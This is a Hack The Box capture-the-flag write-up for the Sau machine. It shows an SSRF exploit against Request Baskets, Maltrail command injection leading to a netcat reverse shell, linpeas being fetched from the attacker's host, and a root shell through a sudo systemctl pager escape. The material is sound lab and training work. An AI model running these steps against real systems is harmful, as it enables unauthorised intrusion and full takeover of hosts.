Sau – Hack The Box Write-up
Last Christmas, I had a crack at an easy Linux machine on Hack The Box.
Enumeration
Nmap
I started off with a port scan using nmap.
kali@kali:~$ nmap 10.10.11.224 Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-27 18:36 EST Nmap scan report for 10.10.11.224 Host is up (0.032s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp filtered http 55555/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds
This shows a couple of interesting results: the SSH port is open along with a mysterious high number port. Port 80 is filtered so I’d like to know what’s running there but I can’t access it directly. When I did a more in-depth scan, with sudo nmap -sV -O -sT -A 10.10.11.224, I found that that port 55555 hosts a web server.
[...]
55555/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Wed, 27 Dec 2023 23:37:16 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Wed, 27 Dec 2023 23:36:50 GMT
| Content-Length: 27
| href="/web">Found.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Wed, 27 Dec 2023 23:36:50 GMT
|_ Content-Length: 0
[...]
But nothing else particularly interesting showed up.
Dirbuster
Dirbuster didn’t find anything else of note:
kali@kali:~$ gobuster dir -u http://10.10.11.224:55555 -w /usr/share/wordlists/dirb/common.txt -t 5 =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.11.224:55555 [+] Method: GET [+] Threads: 5 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /@ (Status: 400) [Size: 75] /~adm (Status: 400) [Size: 75] /~admin (Status: 400) [Size: 75] /~administrator (Status: 400) [Size: 75] /~amanda (Status: 400) [Size: 75] /~bin (Status: 400) [Size: 75] /~ftp (Status: 400) [Size: 75] /~apache (Status: 400) [Size: 75] /~http (Status: 400) [Size: 75] /~logs (Status: 400) [Size: 75] /~guest (Status: 400) [Size: 75] /~httpd (Status: 400) [Size: 75] /~log (Status: 400) [Size: 75] /~nobody (Status: 400) [Size: 75] /~mail (Status: 400) [Size: 75] /~operator (Status: 400) [Size: 75] /~root (Status: 400) [Size: 75] /~lp (Status: 400) [Size: 75] /~test (Status: 400) [Size: 75] /~sysadmin (Status: 400) [Size: 75] /~tmp (Status: 400) [Size: 75] /~sysadm (Status: 400) [Size: 75] /~sys (Status: 400) [Size: 75] /~www (Status: 400) [Size: 75] /~webmaster (Status: 400) [Size: 75] /~user (Status: 400) [Size: 75] /baskets (Status: 401) [Size: 0] /Documents and Settings (Status: 400) [Size: 75] /lost+found (Status: 400) [Size: 75] /Program Files (Status: 400) [Size: 75] /reports list (Status: 400) [Size: 75] /web (Status: 200) [Size: 8700] Progress: 4614 / 4615 (99.98%) =============================================================== Finished ===============================================================
Firefox
When we go to port 55555 in firefox, it shows the Request Baskets application. The version is 1.2.1.
Pwning
A quick google search shows that this version is vulnerable to a SSRF vulnerability, with an exploit available on GitHub. The SSRF vuln can be used to access the filtered port 80 to see what’s running there! We can grab the POC and run it to access port 80 as follows:
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh chmod +x CVE-2023-27163.sh
The POC is shown below:
./CVE-2023-27163.sh http://10.10.11.224:55555/ http://127.0.0.1:80/ Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163 > Creating the "gpgdps" proxy basket... > Basket created! > Accessing http://10.10.11.224:55555/gpgdps now makes the server request to http://127.0.0.1:80/. > Authorization: p07WiXMzYK1xulbH8LTDd9R7q2KwSSsksCf-IqNpKy1-
As the script says, we can now access the filtered port with the URL shown. When we do, we find Maltrail (v0.53).
This version is vulnerable to an OS command execution vulnerability, again with a public exploit. We can exploit this vulnerability by setting up a listener with netcat and running the POC. Note that the POC will need to be modified to use the URL from the previous exploit.
The line with the login must be modified as follows:
target_URL = sys.argv[3] + "/gpgdps/login"
The netcat listener is shown below:
kali@kali:~$ nc -lnvp 1337 listening on [any] 1337 ...
We can then run the exploit using our IP which we can get from using ip addr:
┌──(kali㉿kali)-[~/Downloads/htb/sau] └─$ python3 exploit.py 10.10.14.3 1337 10.10.11.224:55555 Running exploit on 10.10.11.224:55555/gpgdps/login
This causes the listener to receive the callback:
kali@kali:~$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.11.224] 52288 $
We can now cd to the home directory and cat user.txt for the user flag.
$ cd cd $ ls ls user.txt $ cat user.txt cat user.txt <REDACTED>
Local Privilege Escalation
For the next step we grab linpeas and host it with a python web server as shown below:
wget https://github.com/carlospolop/PEASS-ng/releases/download/20231224-836b4ac9/linpeas.sh
[...]
linpeas.sh 100%[================>] 828.05K 4.35MB/s in 0.2s
2023-12-27 20:58:37 (4.35 MB/s) - ‘linpeas.sh’ saved [847920/847920]
kali@kali:~/Downloads/htb/sau/html$ ls
linpeas.sh
kali@kali:~/Downloads/htb/sau/html$ python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
10.10.11.224 - - [27/Dec/2023 20:59:37] "GET /linpeas.sh HTTP/1.1" 200 -
We then execute it to find paths for privesc:
$ wget 10.10.14.3:9000/linpeas.sh wget 10.10.14.3:9000/linpeas.sh --2023-12-28 01:59:37-- http://10.10.14.3:9000/linpeas.sh Connecting to 10.10.14.3:9000... connected. HTTP request sent, awaiting response... 200 OK Length: 847920 (828K) [text/x-sh] Saving to: ‘linpeas.sh’ linpeas.sh 0%[ ] 0 --.-KB/s linpeas.sh 1%[ ] 12.97K 42.0KB/s linpeas.sh 4%[ ] 38.91K 63.2KB/s linpeas.sh 10%[=> ] 90.78K 98.2KB/s linpeas.sh 23%[===> ] 194.53K 158KB/s linpeas.sh 44%[=======> ] 372.20K 242KB/s linpeas.sh 67%[============> ] 558.95K 303KB/s linpeas.sh 91%[=================> ] 754.78K 350KB/s linpeas.sh 100%[===================>] 828.05K 373KB/s in 2.2s 2023-12-28 01:59:40 (373 KB/s) - ‘linpeas.sh’ saved [847920/847920] $ ls ls linpeas.sh user.txt $ chmod +x linpeas.sh chmod +x linpeas.sh $
The output is too long to fit here but one section stands out:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for puma on sau:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
This stands out because the status option to systemctl shouldn’t require root privileges and in many cases invokes the pager which is a route to arbitrary code execution if it is not constrained by disallowing child processes.
In this case, we can invoke a command using the pager’s ! command and then spawn a root shell:
$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
- (press RETURN)
● trail.service - Maltrail. Server of malicious traffic detection system
Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset:>
Active: active (running) since Thu 2023-12-28 00:51:36 UTC; 1h 17min ago
Docs: https://github.com/stamparm/maltrail#readme
https://github.com/stamparm/maltrail/wiki
Main PID: 896 (python3)
Tasks: 11 (limit: 4662)
Memory: 296.6M
CGroup: /system.slice/trail.service
├─ 896 /usr/bin/python3 server.py
├─ 1147 /bin/sh -c logger -p auth.info -t "maltrail[896]" "Failed >
├─ 1149 /bin/sh -c logger -p auth.info -t "maltrail[896]" "Failed >
├─ 1154 sh
├─ 1157 python3 -c import socket,os,pty;s=socket.socket(socket.AF_>
├─ 1158 /bin/sh
├─ 8582 gpg-agent --homedir /home/puma/.gnupg --use-standard-socke>
├─16086 sudo /usr/bin/systemctl status trail.service
├─16087 /usr/bin/systemctl status trail.service
└─16088 pager
Dec 28 00:51:36 sau systemd[1]: Started Maltrail. Server of malicious traffic d>
Dec 28 02:03:56 sau crontab[6030]: (puma) LIST (puma)
Dec 28 02:03:56 sau crontab[6048]: (puma) LIST (puma)
lines 1-23!/bin/sh
!//bbiinn//sshh!/bin/sh
# whoami
whoami
root
#
And capture the final flag 🙂
# cat /root/root.txt cat /root/root.txt <REDACTED> #